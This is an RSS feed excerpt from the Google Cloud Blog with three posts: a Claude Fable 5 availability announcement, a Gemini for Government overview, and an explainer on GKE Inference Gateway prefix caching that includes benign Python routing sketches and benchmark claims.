<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>Cloud Blog</title><link>https://cloud.google.com/blog/</link><description>Cloud Blog</description><atom:link href="https://cloudblog.withgoogle.com/blog/rss/" rel="self"></atom:link><language>en</language><lastBuildDate>Tue, 09 Jun 2026 18:22:57 +0000</lastBuildDate><image><url>https://cloud.google.com/blog/static/blog/images/google.a51985becaa6.png</url><title>Cloud Blog</title><link>https://cloud.google.com/blog/</link></image><item><title>Claude Fable 5: Available on Google Cloud</title><link>https://cloud.google.com/blog/products/ai-machine-learning/cloud-fable-5-on-google-cloud/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Claude Fable 5&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, Anthropic’s latest frontier model, is now generally available on Google Cloud.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; This launch is the latest proof point of our ongoing commitment to bring the industry's latest models straight to our Agent Platform. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Claude Fable 5 brings the best of Anthropic’s model capabilities to all customers, with strong safeguards designed to make it safe for general use. Designed for complex, multi-step reasoning, Claude Fable 5 is well suited to demanding tasks such as advanced software development, long-horizon agents, and deep multimodal document analysis. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;For more information about this release, visit Anthropic’s &lt;/span&gt;&lt;a href="https://www.anthropic.com/news/claude-fable-5-mythos-5" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Build with&lt;/span&gt;&lt;a href="https://console.cloud.google.com/agent-platform/publishers/anthropic/model-garden/claude-fable-5"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; Claude Fable 5&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and other models from Anthropic — including Claude Opus 4.8 and Claude Sonnet 4.6 — today on &lt;/span&gt;&lt;a href="https://cloud.google.com/model-garden?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Tue, 09 Jun 2026 18:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/ai-machine-learning/cloud-fable-5-on-google-cloud/</guid><category>AI &amp; Machine Learning</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/claude_fable_5.jpg" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Claude Fable 5: Available on Google Cloud</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/original_images/claude_fable_5.jpg</image><site_name>Google</site_name><url>https://cloud.google.com/blog/products/ai-machine-learning/cloud-fable-5-on-google-cloud/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Michael Gerstenhaber</name><title>VP, Product Management, Cloud AI</title><department></department><company></company></author></item><item><title>Gemini for Government: Your blueprint for mission impact</title><link>https://cloud.google.com/blog/topics/public-sector/gemini-for-government-your-blueprint-for-mission-impact/</link><description>&lt;div class="block-paragraph"&gt;&lt;p data-block-key="9m6ur"&gt;The public sector has reached a critical inflection point. 
For years, organizations have explored what’s possible through isolated AI pilots and experimentation. Today, the question has shifted to “what creates impact?” where the focus is no longer on hypotheticals, but on achieving real productivity gains, improving services and outcomes, and advancing your mission - &lt;i&gt;right now.&lt;/i&gt; Meeting this moment requires more than just a powerful model—it requires an integrated approach with the security, reliability, scale, and cost-efficiency that public sector missions require.&lt;/p&gt;&lt;p data-block-key="9578k"&gt;Today, public sector organizations are moving swiftly from AI assistants and chatbots to a full-scale agentic taskforce - here’s how they are doing it.&lt;/p&gt;&lt;h3 data-block-key="2u2ma"&gt;&lt;b&gt;Building on a unified foundation&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="43bl8"&gt;To move AI and agents into production at scale, you need to remove the friction of integration. Google Cloud offers a complete AI stack designed to work as one unified system. We believe this integrated stack is the engine for true transformation in the agentic era.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3"&gt;
        &lt;img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/GC_Stack.max-1000x1000.png" alt="GC_Stack"&gt;
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p data-block-key="9m6ur"&gt;Let’s take a closer look at this integrated stack:&lt;/p&gt;&lt;ul&gt;&lt;li data-block-key="3lfgi"&gt;&lt;b&gt;It all starts with the AI Hypercomputer&lt;/b&gt; — our purpose-built infrastructure foundation is optimized for the physics and scale of the agentic era, and powered by both GPUs and TPUs. We continue to invest in our portfolio and made several announcements at Cloud Next ‘26 including the launch of our &lt;a href="https://cloud.google.com/blog/products/compute/tpu-8t-and-tpu-8i-technical-deep-dive?e=48754805"&gt;eighth-generation TPU&lt;/a&gt; and updates to our &lt;a href="https://cloud.google.com/blog/products/compute/cross-cloud-infrastructure-at-next26?e=48754805"&gt;cross-cloud infrastructure&lt;/a&gt; which includes new innovations across fluid compute, secure cross-cloud connectivity, the unified data layer and digital sovereignty.&lt;/li&gt;&lt;li data-block-key="bggir"&gt;We deliver &lt;b&gt;research from Google DeepMind as well as frontier models&lt;/b&gt; to provide intelligence with speed and efficiency. We offer choice across Google’s leading models like our recently announced &lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/innovations-from-google-io-26-on-google-cloud?e=48754805#:~:text=Expand%20what%E2%80%99s%20possible%20with%20Gemini%203.5"&gt;Gemini 3.5&lt;/a&gt; alongside other open and third-party options.&lt;/li&gt;&lt;li data-block-key="f5tbp"&gt;Our &lt;b&gt;agentic data cloud&lt;/b&gt; grounds your AI in trusted real-time organizational truth and context. 
We help you build a 'system of action' with our latest breakthroughs announced at Cloud Next ‘26 including the &lt;a href="https://cloud.google.com/transform/shift-system-of-action-architecting-the-agentic-data-cloud-AI?e=48754805#:~:text=Solving%20the%20walled,massive%20egress%20fees."&gt;Cross-cloud Lakehouse&lt;/a&gt; and &lt;a href="https://cloud.google.com/blog/products/data-analytics/introducing-the-google-cloud-knowledge-catalog?e=48754805"&gt;Knowledge Catalog&lt;/a&gt;.&lt;/li&gt;&lt;li data-block-key="1191k"&gt;With our &lt;b&gt;agentic defense&lt;/b&gt; you get &lt;a href="https://cloud.google.com/learn/what-is-zero-trust?e=48754805"&gt;zero-trust&lt;/a&gt; protection that secures your entire AI lifecycle from code to cloud. To help you navigate the agentic era securely, we recently launched &lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-google-ai-threat-defense?e=48754805"&gt;Google AI Threat Defense&lt;/a&gt; — an automated security system designed to help you continuously monitor for and stop AI-powered threats before they can impact your organization.&lt;/li&gt;&lt;li data-block-key="elqsb"&gt;At Cloud Next ‘26 we unveiled &lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/introducing-gemini-enterprise-agent-platform?e=48754805"&gt;Gemini Enterprise Agent Platform&lt;/a&gt;, our comprehensive platform to build, scale, govern and optimize agents with architectural rigor. This platform brings together model selection, model building, and agent building capabilities with new features for agent integration, development, orchestration, and security.&lt;/li&gt;&lt;li data-block-key="brmti"&gt;All of this comes together at the top with pre-built specialized &lt;b&gt;agents&lt;/b&gt; and &lt;b&gt;applications&lt;/b&gt; that are ready to transform your organization from day 1. 
We announced new capabilities at Cloud Next ‘26 including &lt;a href="https://workspace.google.com/blog/product-announcements/introducing-workspace-intelligence" target="_blank"&gt;Workspace Intelligence&lt;/a&gt; - a secure and dynamic system that inherently understands complex semantic relationships within your Workspace apps (such as Docs, Slides, or Gmail), your active projects, your collaborators, and your organization's domain knowledge.&lt;/li&gt;&lt;/ul&gt;&lt;h3 data-block-key="c2u6i"&gt;&lt;b&gt;Delivering uncompromising security and control&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="3n186"&gt;For many public sector organizations, security &lt;i&gt;is&lt;/i&gt; the mission. This new era of mission-ready and secure AI is defined by the ability to work across silos and legacy systems. IT system administrators have access to a built-in AI Control Dashboard—a single pane of glass to centrally visualize, secure, and audit the organization’s entire AI estate. Through &lt;a href="https://docs.cloud.google.com/agent-registry/overview"&gt;Agent Registry&lt;/a&gt;, administrators maintain complete visibility into active agents and their grounded data sources, ensuring that every interaction stays within the strict guardrails of agency policy and security mandates. &lt;a href="https://cloud.google.com/security/products/model-armor?e=48754805"&gt;Model Armor&lt;/a&gt; provides comprehensive protections against prompt injection, sensitive data leaks, and harmful content. Built on a &lt;a href="https://cloud.google.com/learn/what-is-zero-trust?e=48754805"&gt;Zero Trust foundation&lt;/a&gt;, Gemini for Government includes FedRAMP High-authorized security and compliance features and is backed by a Data Privacy Guarantee stating that Google does not train its foundational models on customer data. 
At &lt;a href="https://cloud.google.com/blog/products/identity-security/next26-redefining-security-for-the-ai-era-with-google-cloud-and-wiz?e=48754805"&gt;Google Cloud Next ‘26,&lt;/a&gt; we introduced new development tools to secure AI-generated code and mitigate the risk of shadow AI, and also shared how we are protecting AI and cloud apps across any infrastructure with &lt;a href="https://cloud.google.com/blog/products/identity-security/google-completes-acquisition-of-wiz?e=48754805"&gt;Wiz&lt;/a&gt;.&lt;/p&gt;&lt;h3 data-block-key="3khal"&gt;&lt;b&gt;Scaling agents across the organization&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="766ab"&gt;In order to realize AI’s true potential, it must be in the hands of your people — caseworkers, inspectors, analysts and more. Google Public Sector was proud to be the first technology provider to offer an enterprise AI tool, Gemini for Government, through GenAI.mil to more than three million civilian and military personnel. We recently introduced a &lt;a href="https://cloud.google.com/blog/topics/public-sector/gemini-for-government-build-custom-ai-agents-for-unclassified-work-on-genaimil/?e=48754805"&gt;new feature within Gemini for Government&lt;/a&gt; on GenAI.mil called Agent Designer which enables DoW civilian and military personnel to build their own agents to support unclassified work tasks.&lt;/p&gt;&lt;p data-block-key="8a0ej"&gt;With &lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/agent-designer"&gt;Agent Designer&lt;/a&gt;, non-technical users can build sophisticated AI agents using natural language through no-code interfaces. Our goal is to provide the tools to empower &lt;i&gt;everyone&lt;/i&gt; in the organization to build and use agents that connect securely to existing systems and enterprise applications. 
This is all about using AI and agents to automate manual and time-consuming tasks, improve productivity, and ensure you and your teams can apply your experience and judgment to the most critical aspects of your work.&lt;/p&gt;&lt;h3 data-block-key="225g7"&gt;&lt;b&gt;Achieving tangible ROI&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="7tqqn"&gt;According to our recent &lt;a href="https://cloud.google.com/blog/topics/public-sector/key-insights-from-our-inaugural-survey-on-the-roi-of-ai-in-the-public-sector/?e=48754805"&gt;ROI of AI in the public sector report&lt;/a&gt;, agentic and generative AI are already helping public sector teams get more done. According to our findings, &lt;b&gt;70%&lt;/b&gt; of public sector leaders report improved productivity from gen AI. Of those reporting improved productivity, &lt;b&gt;46%&lt;/b&gt; say employee productivity has at least doubled. This translates directly into faster response times, more efficient public services, and better outcomes overall. &lt;a href="https://ai.google.dev/gemini-api/docs/interactions/deep-research" target="_blank"&gt;Gemini Deep Research Agent&lt;/a&gt; and &lt;a href="https://notebooklm.google/?gad_source=1&amp;amp;gad_campaignid=22476587015&amp;amp;gbraid=0AAAAA-fwSsc9O8X8TnAEA8uvL58QrYtN-&amp;amp;gclid=Cj0KCQjwz9_QBhD_ARIsADnSCfAm5Xad2GqSBZtd00eB3Rjlt5IcFDwMkdE5gbYKh_u4ss7UGIFNeH8aAkNhEALw_wcB" target="_blank"&gt;NotebookLM&lt;/a&gt; are force multipliers for the public sector, transforming how complex research, deep work, and analysis are conducted.&lt;/p&gt;&lt;h3 data-block-key="f70pu"&gt;&lt;b&gt;Your blueprint for mission impact&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="ckocp"&gt;With Gemini for Government, you are able to move beyond AI exploration and pilots to real-world applications and agents - at scale. 
This is all about applying technology to amplify human capacity, accelerate strategic decision-making, and advance your mission.&lt;/p&gt;&lt;p data-block-key="6tt10"&gt;Register to attend our &lt;a href="https://cloudonair.withgoogle.com/events/gemini-for-government-the-blueprint-for-mission-impact?utm_source=cgc-blog&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY26-Q2-northam-PUB39634-onlineevent-er-q2-26-g4g-webinar&amp;amp;utm_content=kd_bp&amp;amp;utm_term=-" target="_blank"&gt;Gemini for Government webinar&lt;/a&gt; on June 11 where we’ll dive deeper into how to leverage data, security, and an integrated AI stack. Whether you are looking to scale day-one use cases across your organization, empower your internal champions, or are just getting started, you will leave with a clear path forward to drive impact and advance your mission today.&lt;/p&gt;&lt;/div&gt;</description><pubDate>Tue, 09 Jun 2026 17:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/public-sector/gemini-for-government-your-blueprint-for-mission-impact/</guid><category>Public Sector</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/G4Gblog_image.max-600x600.jpg" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Gemini for Government: Your blueprint for mission impact</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/G4Gblog_image.max-600x600.jpg</image><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/public-sector/gemini-for-government-your-blueprint-for-mission-impact/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Elizabeth Moon</name><title>Managing Director, Customer Engineering</title><department></department><company>Google Public Sector</company></author></item><item><title>Report: GKE Inference Gateway delivers up to 92% faster AI 
responses</title><link>https://cloud.google.com/blog/products/containers-kubernetes/gke-inference-gateway-prefix-caching-accelerates-ai-inference/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As generative AI moves from experimental pilots to massive production environments, the efficiency of your infrastructure  becomes the ultimate differentiator. One way to get the most out of it and minimize costly accelerator idle time is to leverage the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/about-gke-inference-gateway"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Kubernetes Engine (GKE) Inference Gateway&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which intelligently routes generative AI workloads based on real-time model server metrics.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Instead of relying on traditional, naive round-robin load balancing — which frequently triggers expensive accelerator recomputation and spikes user latency — this native extension of the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/gateway-api"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GKE Gateway&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; utilizes advanced capabilities like &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/about-gke-inference-gateway"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;prefix caching&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/about-gke-inference-gateway"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;model-aware routing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. By ensuring requests land on the exact accelerator that is primed to process them right away, GKE transforms how you can serve your large language models (LLMs), with excellent hardware utilization and ultra-fast response times. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In fact, according to an&lt;/span&gt;&lt;a href="https://www.principledtechnologies.com/Google/GKE-Inference-Gateway-study-0526.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; independent benchmark report&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE Inference Gateway outperforms the next leading managed Kubernetes service with 15.7% higher throughput, 92.8% shorter wait times, and 62.6% lower inter-token latency&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. This performance takes LLM-based applications from sluggish and  expensive to fast and production-grade.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;That performance tracks with &lt;/span&gt;&lt;a href="https://www.snap.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Snap&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;’s experience using GKE Inference Gateway. &lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;“At Snap, we are integrating llm-d into our production AI infrastructure to facilitate high-performance inference at scale. By employing prefix-cache-aware routing, we have achieved prefix cache hit rates ranging up to 75-80%. We appreciate the open-source nature of llm-d, as it enables seamless integration with our Envoy-based Service Mesh.”&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; - Vinay Kola, Senior Manager, Software Engineering, Snap Inc. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, we take a closer look at GKE Inference Gateway’s prefix caching, complete with examples. We also provide more details about its benchmark results. Let’s jump in.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The secret to low-latency AI: Prefix caching&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prefix caching&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; optimizes LLM performance by storing the KV cache (the attention key and value tensors computed while the prompt is processed) of long, repetitive prompt prefixes. When user requests share the same system instructions, context, or documentation, the model server can skip reprocessing those tokens, provided the request lands on a server that still holds them. GKE Inference Gateway reads incoming request prefixes and matches them to the specific pods that already hold that data in memory. This removes most of the prompt-processing cost for the shared prefix on your GPUs and TPUs, which is what shortens the wait for the first token.&lt;/span&gt;&lt;/p&gt;
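&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To make the routing idea concrete, here is a minimal sketch of prefix-aware routing. It is not GKE Inference Gateway's implementation or API: the names &lt;code&gt;PrefixAwareRouter&lt;/code&gt;, &lt;code&gt;prefix_block_hashes&lt;/code&gt;, and &lt;code&gt;BLOCK_CHARS&lt;/code&gt; are hypothetical, the pod names are placeholders, and prompts are split into character blocks for simplicity where a real model server would work on token blocks. Each block hash covers all text before it, so two prompts share a hash only if they share the whole prefix up to that block.&lt;/span&gt;&lt;/p&gt;

```python
import hashlib
from itertools import cycle

# Hypothetical block size in characters; real servers cache per token block.
BLOCK_CHARS = 64


def prefix_block_hashes(prompt: str, block_chars: int = BLOCK_CHARS) -> list[str]:
    """Return one chained hash per full block; hash i covers blocks 0..i."""
    hashes = []
    running = hashlib.sha256()
    for i in range(len(prompt) // block_chars):
        block = prompt[i * block_chars:(i + 1) * block_chars]
        running.update(block.encode("utf-8"))
        hashes.append(running.hexdigest())
    return hashes


class PrefixAwareRouter:
    """Toy router: send each request to the pod with the longest cached prefix."""

    def __init__(self, pods):
        self.pods = list(pods)
        # Block hashes each pod is assumed to hold in its KV cache.
        self.cached = {pod: set() for pod in self.pods}
        # Round-robin fallback for requests with no cached prefix anywhere.
        self._fallback = cycle(self.pods)

    def route(self, prompt: str):
        hashes = prefix_block_hashes(prompt)
        best_pod, best_len = None, 0
        for pod in self.pods:
            matched = 0
            for block_hash in hashes:
                if block_hash not in self.cached[pod]:
                    break
                matched += 1
            if matched > best_len:
                best_pod, best_len = pod, matched
        if best_pod is None:
            best_pod = next(self._fallback)
        # After serving the request, the chosen pod holds this prompt's blocks.
        self.cached[best_pod].update(hashes)
        return best_pod, best_len
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this sketch, the first request carrying a given system prompt falls back to round-robin, and later requests that start with the same text are sent to the same pod along with the number of matching blocks. A production router would also weigh pod load and cache eviction, which this sketch ignores.&lt;/span&gt;&lt;/p&gt;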
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Use case 1:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Documentation and codebase Q&amp;amp;A with retrieval-augmented generation (RAG) &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When querying massive enterprise repositories with RAG, you can ground your LLM’s responses while keeping added latency low by pinning entire documentation sets as static cached prefixes.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Instead of forcing an LLM to re-read thousands of lines of API references or corporate wikis for every single user question, GKE Inference Gateway routes the query to a pod that already has that specific context warmed up in its KV cache. The LLM only has to compute the user's brief, dynamic question, completely bypassing expensive document re-evaluation.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;[STATIC PREFIX - STAYS IN CACHE] You are an expert AI assistant specializing in technical documentation. Below is the complete API documentation for our software platform. Use this context to answer the user's questions accurately. If the answer cannot be found in the documentation, say &amp;quot;I cannot find that in the provided context.&amp;quot;

&amp;lt;documentation&amp;gt; [10,000+ words of API reference documentation, endpoints, error codes, etc.] &amp;lt;/documentation&amp;gt;

[DYNAMIC SUFFIX - CHANGES PER REQUEST] User Question: How do I handle a 429 rate limit error using the Python SDK?&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
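&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The prompt layout above only benefits from prefix caching if the static part comes first and is byte-for-byte identical across requests. The sketch below shows one way to assemble such prompts and to measure how much of two prompts is shared. The helper names &lt;code&gt;build_prompt&lt;/code&gt; and &lt;code&gt;shared_prefix_ratio&lt;/code&gt; are hypothetical, and the plain-text documentation delimiters are an assumption chosen for this example.&lt;/span&gt;&lt;/p&gt;

```python
import os.path

SYSTEM_INSTRUCTIONS = (
    "You are an expert AI assistant specializing in technical documentation. "
    "Use the documentation below to answer the user's questions accurately."
)


def build_prompt(system_instructions: str, documentation: str, question: str) -> str:
    """Place everything that never changes first, and the user question last."""
    static_prefix = (
        f"{system_instructions}\n\n"
        f"DOCUMENTATION START\n{documentation}\nDOCUMENTATION END\n\n"
    )
    dynamic_suffix = f"User Question: {question}"
    return static_prefix + dynamic_suffix


def shared_prefix_ratio(prompt_a: str, prompt_b: str) -> float:
    """Fraction of the longer prompt covered by the common leading text."""
    # os.path.commonprefix compares strings character by character.
    shared = os.path.commonprefix([prompt_a, prompt_b])
    return len(shared) / max(len(prompt_a), len(prompt_b))
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With a large documentation string, two prompts that differ only in the question share nearly all of their text as a common prefix. Placing the question before the documentation instead would leave almost nothing to reuse.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;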
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Use case 2: Multi-turn chat  &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can also use prefix caching to maintain customer service interactions across thousands of simultaneous sessions without compounding compute costs. You can do so by caching permanent system personas and core business rules directly on the LLM server.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In enterprise chat architectures, the base system prompt and reference tables remain completely identical across millions of customer interactions. GKE Inference Gateway handles these multi-turn conversations using context-aware routing to bypass repetitive token processing, so that your chatbot stays ultra-responsive even under peak traffic.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;[STATIC PREFIX - STAYS IN CACHE]
- System Persona: You are &amp;quot;FinBot&amp;quot;, a helpful, empathetic, and compliant virtual assistant for ABC Banking Solutions. You must strictly adhere to the following rules: 1. Never provide concrete investment advice. 2. Always verify if the user is asking about checking or savings. 3. Keep your answers under 3 sentences. 4. If a user is angry, offer to connect them to a human manager.

Here is the current interest rate table for May 2026:
- Savings: 4.2% APR
- Checking: 0.5% APR
- CD (12-month): 5.1% APR

[DYNAMIC SUFFIX - CHANGES PER REQUEST] User: Hi, I'm trying to figure out how much I'd make if I locked away $10,000 for a year?&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
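&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In a multi-turn chat, the reusable prefix grows with the conversation: if each turn is appended to the end of the prompt, the prompt for one turn is an exact prefix of the prompt for the next. The sketch below illustrates that property. The &lt;code&gt;ChatSession&lt;/code&gt; class and its rendering format are hypothetical and not taken from any particular model server.&lt;/span&gt;&lt;/p&gt;

```python
from dataclasses import dataclass, field


@dataclass
class ChatSession:
    """Append-only conversation whose rendered prompt only ever grows at the end."""

    system_prompt: str
    turns: list = field(default_factory=list)  # list of (role, text) pairs

    def add(self, role: str, text: str) -> None:
        self.turns.append((role, text))

    def render(self) -> str:
        # The system prompt always comes first, followed by turns in order.
        lines = [self.system_prompt, ""]
        for role, text in self.turns:
            lines.append(f"{role}: {text}")
        return "\n".join(lines) + "\n"
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Because earlier text is never rewritten, a server that cached the previous turn can reuse all of it and only process the newest message. Editing or reordering earlier turns would break that property and force recomputation from the point of the change.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;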
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE outperforms alternative managed Kubernetes solutions&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To validate these architectural advantages, Principled Technologies recently released an independent &lt;/span&gt;&lt;a href="https://www.principledtechnologies.com/Google/GKE-Inference-Gateway-study-0526.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;benchmark report&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; comparing GKE (equipped with the GKE Inference Gateway) against a standard third-party managed Kubernetes service utilizing conventional round-robin HTTP load balancing.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In tests on a Llama 3.1 8B Instruct shared-prefix workload using identical hardware (eight NVIDIA A100 40GB GPUs), the results show a large performance gap between the two Kubernetes services. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE led on three critical metrics:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Higher throughput:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; 15.7% more tokens processed per second, enabling higher request capacity or reduced hardware needs for the same workload&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Much faster time to first token (TTFT):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; 92.8% shorter wait times, producing dramatically quicker perceived response starts for interactive scenarios&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Lower inter-token latency (ITL):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; 62.6% reduction, resulting in smoother and faster token streaming after the first token&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3"&gt;
        &lt;img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_-_Updated_Doc_chart.max-1000x1000.jpg" alt="1 - Updated Doc chart"&gt;
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="g6g32"&gt;Figure 3: Mean latency (normalized time per output token) of GKE with GKE Inference Gateway and third-party managed Kubernetes service on the Llama 3.1-8B Instruct LLM on the Shared prefix use case. Both solutions used the same hardware. Source: Principled Technologies&lt;/p&gt;&lt;/figcaption&gt;
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
